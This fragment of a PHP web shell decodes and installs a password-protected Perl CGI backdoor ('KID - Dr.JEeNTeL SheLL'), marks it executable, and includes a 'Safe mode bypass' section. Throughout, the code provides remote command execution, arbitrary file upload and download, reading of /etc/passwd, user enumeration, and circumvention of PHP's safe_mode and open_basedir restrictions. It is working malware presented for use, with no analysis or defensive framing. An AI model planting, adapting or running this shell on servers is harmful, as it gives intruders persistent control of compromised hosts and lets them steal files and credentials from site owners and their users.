2NvZGU+IjsNCgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIGRvd25sb2FkcyBhIGZpbGUuIEl0IGRpc3BsYXlzIGEgbWVzc2FnZQ0KIyB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rIHRocm91Z2ggd2hpY2ggdGhlIGZpbGUgY2FuIGJlIGRvd25sb2FkZWQuDQojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsDQojIHRoZSBmaWxlIGlzIHJlYWQgYW5kIHNlbnQgdG8gdGhlIGJyb3dzZXIuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQmVnaW5Eb3dubG9hZA0Kew0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwNCgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0KCWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCQkkVGFyZ2V0RmlsZSAuPSAkUGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2UgaGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZpbGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsNCgkJJlByaW50RG93bmxvYWRMaW5rUGFnZSgkVGFyZ2V0RmlsZSk7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGUgaXMgbm90IHNwZWNpZmllZCwgaXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBVcGxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwgcHJpbnQgdGhlIHVwbG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50RmlsZVVwbG9hZEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KDQoJIyBzdGFydCB0aGUgdXBsb2FkaW5nIHByb2Nlc3MNCglwcmludCAiPGNvZGU+VXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsNCg0KCSMgZ2V0IHRoZSBmdWxsbHkgcXVhbGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGNyZWF0ZWQNCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkkVHJhbnNmZXJGaWxlID1+IG0hKFteL15cXF0qKSQhOw0KCSRUYXJnZXROYW1lIC49ICRQYXRoU2VwLiQxOw0KDQoJJFRhcmdldEZpbGVTaXplID0gbGVuZ3RoKCRpbnsnZmlsZWRhdGEnfSk7DQoJIyBpZiB0aGUgZmlsZSBleGlzdHMgYW5kIHdlIGFyZSBub3Qgc3VwcG9zZWQgdG8gb3ZlcndyaXRlIGl0DQoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpDQoJew0KCQlwcmludCAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOw0KCX0NCgllbHNlICMgZmlsZSBpcyBub3QgcHJlc2VudA0KCXsNCgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRUYXJnZXROYW1lIikpDQoJCXsNCgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOw0KCQkJcHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307DQoJCQljbG9zZShVUExPQURGSUxFKTsNCgkJCXByaW50ICJUcmFuc2ZlcmVkICRUYXJnZXRGaWxlU2l6ZSBCeXRlcy48YnI+IjsNCgkJCXByaW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7DQoJCX0NCgkJZWxzZQ0KCQl7DQoJCQlwcmludCAiRmFpbGVkOiAkITxicj4iOw0KCQl9DQoJfQ0KCXByaW50ICI8L2NvZGU+IjsNCgkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCgkmUHJpbnRQYWdlRm9vdGVyOw0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgd2FudHMgdG8gZG93bmxvYWQgYSBmaWxlLiBJZiB0aGUNCiMgZmlsZW5hbWUgaXMgbm90IHNwZWNpZmllZCwgaXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxlLCBvdGhlcndpc2UgaXQgZGlzcGxheXMgYSBtZXNzYWdlIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsNCiMgdGhyb3VnaCAgd2hpY2ggdGhlIGZpbGUgY2FuIGJlIGRvd25sb2FkZWQuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgRG93bmxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwgcHJpbnQgdGhlIGRvd25sb2FkIGZvcm0gYWdhaW4NCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQ0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigiZiIpOw0KCQkmUHJpbnRGaWxlRG93bmxvYWRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCQlyZXR1cm47DQoJfQ0KDQoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZA0KCWlmKCgkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cXHxeLjovKSkgfA0KCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUNCgl7DQoJCSRUYXJnZXRGaWxlID0gJFRyYW5zZmVyRmlsZTsNCgl9DQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUNCgl7DQoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7DQoJfQ0KDQoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUNCgl7DQoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7DQoJfQ0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlDQoJew0KCQkmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgTWFpbiBQcm9ncmFtIC0gRXhlY3V0aW9uIFN0YXJ0cyBIZXJlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQomUmVhZFBhcnNlOw0KJkdldENvb2tpZXM7DQoNCiRTY3JpcHRMb2NhdGlvbiA9ICRFTlZ7J1NDUklQVF9OQU1FJ307DQokU2VydmVyTmFtZSA9ICRFTlZ7J1NFUlZFUl9OQU1FJ307DQokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9Ow0KJFJ1bkNvbW1hbmQgPSAkaW57J2MnfTsNCiRUcmFuc2ZlckZpbGUgPSAkaW57J2YnfTsNCiRPcHRpb25zID0gJGlueydvJ307DQoNCiRBY3Rpb24gPSAkaW57J2EnfTsNCiRBY3Rpb24gPSAibG9naW4iIGlmKCRBY3Rpb24gZXEgIiIpOyAjIG5vIGFjdGlvbiBzcGVjaWZpZWQsIHVzZSBkZWZhdWx0DQoNCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQNCiRDdXJyZW50RGlyID0gJGlueydkJ307DQpjaG9wKCRDdXJyZW50RGlyID0gYCRDbWRQd2RgKSBpZigkQ3VycmVudERpciBlcSAiIik7DQoNCiRMb2dnZWRJbiA9ICRDb29raWVzeydTQVZFRFBXRCd9IGVxICRQYXNzd29yZDsNCg0KaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pICMgdXNlciBuZWVkcy9oYXMgdG8gbG9naW4NCnsNCgkmUGVyZm9ybUxvZ2luOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAiY29tbWFuZCIpICMgdXNlciB3YW50cyB0byBydW4gYSBjb21tYW5kDQp7DQoJJkV4ZWN1dGVDb21tYW5kOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAidXBsb2FkIikgIyB1c2VyIHdhbnRzIHRvIHVwbG9hZCBhIGZpbGUNCnsNCgkmVXBsb2FkRmlsZTsNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImRvd25sb2FkIikgIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQ0Kew0KCSZEb3dubG9hZEZpbGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJsb2dvdXQiKSAjIHVzZXIgd2FudHMgdG8gbG9nb3V0DQp7DQoJJlBlcmZvcm1Mb2dvdXQ7DQp9DQoNCg0K');
$write = fwrite ($file ,$sa);
$file = fopen($dir."dkcgi/dz.sa" ,"w+");
$sa=base64_decode('#!/usr/bin/perl -I/usr/local/bandmin
$NTCmdSep = "&";
$UnixCmdSep = ";";
$CommandTimeoutDuration = 300;
$ShowDynamicOutput = 1;
$password = "dk";
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
sub ReadParse 
{
	local (*in) = @_ if @_;
	local ($i, $loc, $key, $val);
	
	$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;

	if($ENV{'REQUEST_METHOD'} eq "GET")
	{
		$in = $ENV{'QUERY_STRING'};
	}
	elsif($ENV{'REQUEST_METHOD'} eq "POST")
	{
		binmode(STDIN) if $MultipartFormData & $WinNT;
		read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
	}

	# handle file upload data
	if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
	{
		$Boundary = '--'.$1; # please refer to RFC1867 
		@list = split(/$Boundary/, $in); 
		$HeaderBody = $list[1];
		$HeaderBody =~ /\r\n\r\n|\n\n/;
		$Header = $`;
		$Body = $';
 		$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
		$in{'filedata'} = $Body;
		$Header =~ /filename=\"(.+)\"/; 
		$in{'f'} = $1; 
		$in{'f'} =~ s/\"//g;
		$in{'f'} =~ s/\s//g;

		# parse trailer
		for($i=2; $list[$i]; $i++)
		{ 
			$list[$i] =~ s/^.+name=$//;
			$list[$i] =~ /\"(\w+)\"/;
			$key = $1;
			$val = $';
			$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
			$val =~ s/%(..)/pack("c", hex($1))/ge;
			$in{$key} = $val; 
		}
	}
	else # standard post data (url encoded, not multipart)
	{
		@in = split(/&/, $in);
		foreach $i (0 .. $#in)
		{
			$in[$i] =~ s/\+/ /g;
			($key, $val) = split(/=/, $in[$i], 2);
			$key =~ s/%(..)/pack("c", hex($1))/ge;
			$val =~ s/%(..)/pack("c", hex($1))/ge;
			$in{$key} .= "\0" if (defined($in{$key}));
			$in{$key} .= $val;
		}
	}
}

#------------------------------------------------------------------------------
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#------------------------------------------------------------------------------
sub foo
    {
        my ( $login, $p, $uid, $gid, $gecos, $dir, $s );
     
        my %HoH = ();
     
        my $file = '/etc/passwd';
        open( PASSWD, "< $file" ) or die "Can't open $file : $!";
     
        while( <PASSWD> ) {
            ( $login, $p, $uid, $gid, $gecos, $dir, $s ) = split( ':' );
     
            $HoH{ $login }{ 'uid' } = $uid;
            $HoH{ $login }{ 'gid' } = $gid;
            $HoH{ $login }{ 'dir' } = $dir;
        }
     
        close PASSWD;
     
        return \%HoH;
    }
sub PrintPageHeader
{
	$EncodedCurrentDir = $CurrentDir;
	$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
	print "Content-type: text/html\n\n";
	print <<END;
<html>
<head>
<title>KID - Dr.JEeNTeL SheLL</title>
$HtmlMetaHeader
</head>
<body style='color: #000000;background:url(http://dz4all.com/cc/images/almjazf-sa/nav/nav_18.gif) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
<td colspan="2" bgcolor="#00ff00"><p align="center">s<font face="Verdana" size="2">
<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> | 
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
<a href="$ScriptLocation?a=logout">Disconnect</a>
<table border="0" width="100%" cellspacing="0" cellpadding="2">
<p align="center"><font face="Verdana" size="3" color="#FF0000">KID-Shell - Server::  <font color="#00FF00">$ServerName</font></font>
</tr>
<tr>
</font></td>
</tr>
</table>
<font color="#C0C0C0" size="3">
END
}

#------------------------------------------------------------------------------
# Prints the Login Screen
#------------------------------------------------------------------------------
sub PrintLoginScreen
{
	$Message = q$<pre><font color="#00ff00">
      -- Enter Password --
</font></pre>
$;
#'
	print <<END;
$Message
END
}

#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
	print <<END;
<code>
<br>login: admin<br>
password:<br>
Login incorrect<br><br>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
	print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="login"><font color="#00ff00">Password : </font><input type="password" name="p">
<input type="submit" value="Enter">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
	print "</font></body></html>";
}

#------------------------------------------------------------------------------
# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{''}
#------------------------------------------------------------------------------
sub GetCookies
{
	@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
	foreach $cookie(@httpcookies)
	{
		($id, $val) = split(/=/, $cookie);
		$Cookies{$id} = $val;
	}
}

#------------------------------------------------------------------------------
# Prints the screen when the user logs out
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
	print "<code>Connection closed by foreign host.<br><br></code>";
}

#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#------------------------------------------------------------------------------
sub PerformLogout
{
	print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
	&PrintPageHeader("p");
	&PrintLogoutScreen;
	&PrintLoginScreen;
	&PrintLoginForm;
	&PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
#------------------------------------------------------------------------------
sub PerformLogin 
{
	if($LoginPassword eq $password) # password matched
	{
		print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
		&PrintPageHeader("c");
		&PrintCommandLineInputForm;
		&PrintPageFooter;
	}
	else # password didn't match
	{
		&PrintPageHeader("p");
		&PrintLoginScreen;
		if($LoginPassword ne "") # some password was entered
		{
			&PrintLoginFailedMessage;
		}
		&PrintLoginForm;
		&PrintPageFooter;
	}
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
	print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="command">
<input type="hidden" name="d" value="$CurrentDir">
<font color="#00FF00">$Prompt</font> 
<input type="text" name="c" size="25">
<input type="submit" value="Enter">
</form>
</code>
           
END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
	print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input type="text" name="f" size="35"><br><br>
Download: <input type="submit" value="Begin">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
	print <<END;
<code>
<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input type="file" name="f" size="35"><br><br>
Options:  <input type="checkbox" name="o" value="overwrite">
Overwrite if it Exists<br><br>
Upload:   <input type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="upload">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#------------------------------------------------------------------------------
sub CommandTimeout
{
	if(!$WinNT)
	{
		alarm(0);
		print <<END;
</xmp>
<code>
Command exceeded maximum time of $CommandTimeoutDuration second(s).
<br>Killed it!
<code>
END
		&PrintCommandLineInputForm;
		&PrintPageFooter;
		exit;
	}
}

#------------------------------------------------------------------------------
# This function is called to execute commands. It displays the output of the
# command and allows the user to enter another command. The change directory
# command is handled differently. In this case, the new directory is stored in
# an internal variable and is used each time a command has to be executed. The
# output of the change directory command is not displayed to the users
# therefore error messages cannot be displayed.
#------------------------------------------------------------------------------
sub ExecuteCommand
{
	if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
	{
		# we change the directory internally. The output of the
		# command is not displayed.
		
		$OldDir = $CurrentDir;
		$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
		chop($CurrentDir = `$Command`);
		&PrintPageHeader("c");
		&PrintCommandLineInputForm;
		print "<div style='float: center; text-align: left;'>";
		$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
		print "<code>$Prompt $RunCommand</code>";
	}
	else # some other command, display the output
	{
		&PrintPageHeader("c");
		&PrintCommandLineInputForm;
		print "<div style='float: center; text-align: left;'>";
		$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
		print "<code>$Prompt $RunCommand</code><xmp style='color: #00FF00;'>";
		$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
		if(!$WinNT)
		{
			$SIG{'ALRM'} = \&CommandTimeout;
			alarm($CommandTimeoutDuration);
		}
		if($ShowDynamicOutput) # show output as it is generated
		{
			$|=1;
			$Command .= " |";
			open(CommandOutput, $Command);
			while(<CommandOutput>)
			{
				$_ =~ s/(\n|\r\n)$//;
				print "$_\n";
			}
			$|=0;
		}
		else # show output after command completes
		{
			print `$Command`;
		}
		if(!$WinNT)
		{
			alarm(0);
		}
		print "</xmp>";
	}
	print "</div>";
	&PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
#------------------------------------------------------------------------------
sub PrintDownloadLinkPage
{
	local($FileUrl) = @_;
	if(-e $FileUrl) # if the file exists
	{
		# encode the file link so we can send it to the browser
		$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
		$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
		$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
		&PrintPageHeader("c");
		print <<END;
<code>
Sending File $TransferFile...<br>
If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>.
</code>
END
		&PrintCommandLineInputForm;
		&PrintPageFooter;
	}
	else # file doesn't exist
	{
		&PrintPageHeader("f");
		print "<code>Failed to download $FileUrl: $!</code>";
		&PrintFileDownloadForm;
		&PrintPageFooter;
	}
}

#------------------------------------------------------------------------------
# This function reads the specified file from the disk and sends it to the
# browser, so that it can be downloaded by the user.
# Argument 1: Fully qualified pathname of the file to be sent.
#------------------------------------------------------------------------------
sub SendFileToBrowser
{
	local($SendFile) = @_;
	if(open(SENDFILE, $SendFile)) # file opened for reading
	{
		if($WinNT)
		{
			binmode(SENDFILE);
			binmode(STDOUT);
		}
		$FileSize = (stat($SendFile))[7];
		($Filename = $SendFile) =~  m!([^/^\\]*)$!;
		print "Content-Type: application/x-unknown\n";
		print "Content-Length: $FileSize\n";
		print "Content-Disposition: attachment; filename=$1\n\n";
		print while(<SENDFILE>);
		close(SENDFILE);
	}
	else # failed to open file
	{
		&PrintPageHeader("f");
		print "<code>Failed to download $SendFile: $!</code>";
		&PrintFileDownloadForm;
		&PrintPageFooter;
	}
}


#------------------------------------------------------------------------------
# This function is called when the user downloads a file. It displays a message
# to the user and provides a link through which the file can be downloaded.
# This function is also called when the user clicks on that link. In this case,
# the file is read and sent to the browser.
#------------------------------------------------------------------------------
sub BeginDownload
{
	# get fully qualified path of the file to be downloaded
	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
		(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
	{
		$TargetFile = $TransferFile;
	}
	else # path is relative
	{
		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
		$TargetFile .= $PathSep.$TransferFile;
	}

	if($Options eq "go") # we have to send the file
	{
		&SendFileToBrowser($TargetFile);
	}
	else # we have to send only the link page
	{
		&PrintDownloadLinkPage($TargetFile);
	}
}

#------------------------------------------------------------------------------
# This function is called when the user wants to upload a file. If the
# file is not specified, it displays a form allowing the user to specify a
# file, otherwise it starts the upload process.
#------------------------------------------------------------------------------
sub UploadFile
{
	# if no file is specified, print the upload form again
	if($TransferFile eq "")
	{
		&PrintPageHeader("f");
		&PrintFileUploadForm;
		&PrintPageFooter;
		return;
	}
	&PrintPageHeader("c");

	# start the uploading process
	print "<code>Uploading $TransferFile to $CurrentDir...<br>";

	# get the fullly qualified pathname of the file to be created
	chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
	$TransferFile =~ m!([^/^\\]*)$!;
	$TargetName .= $PathSep.$1;

	$TargetFileSize = length($in{'filedata'});
	# if the file exists and we are not supposed to overwrite it
	if(-e $TargetName && $Options ne "overwrite")
	{
		print "Failed: Destination file already exists.<br>";
	}
	else # file is not present
	{
		if(open(UPLOADFILE, ">$TargetName"))
		{
			binmode(UPLOADFILE) if $WinNT;
			print UPLOADFILE $in{'filedata'};
			close(UPLOADFILE);
			print "Transfered $TargetFileSize Bytes.<br>";
			print "File Path: $TargetName<br>";
		}
		else
		{
			print "Failed: $!<br>";
		}
	}
	print "</code>";
	&PrintCommandLineInputForm;
	&PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called when the user wants to download a file. If the
# filename is not specified, it displays a form allowing the user to specify a
# file, otherwise it displays a message to the user and provides a link
# through  which the file can be downloaded.
#------------------------------------------------------------------------------
sub DownloadFile
{
	# if no file is specified, print the download form again
	if($TransferFile eq "")
	{
		&PrintPageHeader("f");
		&PrintFileDownloadForm;
		&PrintPageFooter;
		return;
	}
	
	# get fully qualified path of the file to be downloaded
	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
		(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
	{
		$TargetFile = $TransferFile;
	}
	else # path is relative
	{
		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
		$TargetFile .= $PathSep.$TransferFile;
	}

	if($Options eq "go") # we have to send the file
	{
		&SendFileToBrowser($TargetFile);
	}
	else # we have to send only the link page
	{
		&PrintDownloadLinkPage($TargetFile);
	}
}

#------------------------------------------------------------------------------
# Main Program - Execution Starts Here
#------------------------------------------------------------------------------
&ReadParse;
&GetCookies;

$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};

$Action = $in{'a'};
$Action = "login" if($Action eq ""); # no action specified, use default

# get the directory in which the commands will be executed
$CurrentDir = $in{'d'};
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");

$LoggedIn = $Cookies{'SAVEDPWD'} eq $password;

if($Action eq "login" || !$LoggedIn) # user needs/has to login
{
	&PerformLogin;
}
elsif($Action eq "command") # user wants to run a command
{
	&ExecuteCommand;
}
elsif($Action eq "upload") # user wants to upload a file
{
	&UploadFile;
}
elsif($Action eq "download") # user wants to download a file
{
	&DownloadFile;
}
elsif($Action eq "logout") # user wants to logout
{
	&PerformLogout;
}
');
$write = fwrite ($file ,$sa);

chmod($dir."dkcgi/dz.sa" , 0755);
chmod($dir."dkcgi/cgi.pl" , 0755);
	 
	 
	 
	$temp='';
	ob_start();
	switch($_POST['p1']) {
		case 1:
			$temp=@tempnam($test, 'cx');
			if(@copy("compress.zlib://".$_POST['p2'], $temp)){
				echo @file_get_contents($temp);
				unlink($temp);
			} else
				echo 'Sorry... Can\'t open file';
			break;
		case 2:
			$files = glob($_POST['p2'].'*');
			if( is_array($files) )
				foreach ($files as $filename)
					echo $filename."
";
			break;
		case 3:
			$ch = curl_init("file://".$_POST['p2']."".preg_replace('!\(\d+\)\s.*!', '', __FILE__));
			curl_exec($ch);
			break;
		case 4:
			ini_restore("safe_mode");
			ini_restore("open_basedir");
			include($_POST['p2']);
			break;
		case 5:
			for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
				$uid = @posix_getpwuid($_POST['p2']);
				if ($uid)
					echo join(':',$uid)."
";
			}
			break;
	}
	$temp = ob_get_clean();
	wsoHeader();
	
	echo '<h1>Safe mode bypass</h1><div class=content>';
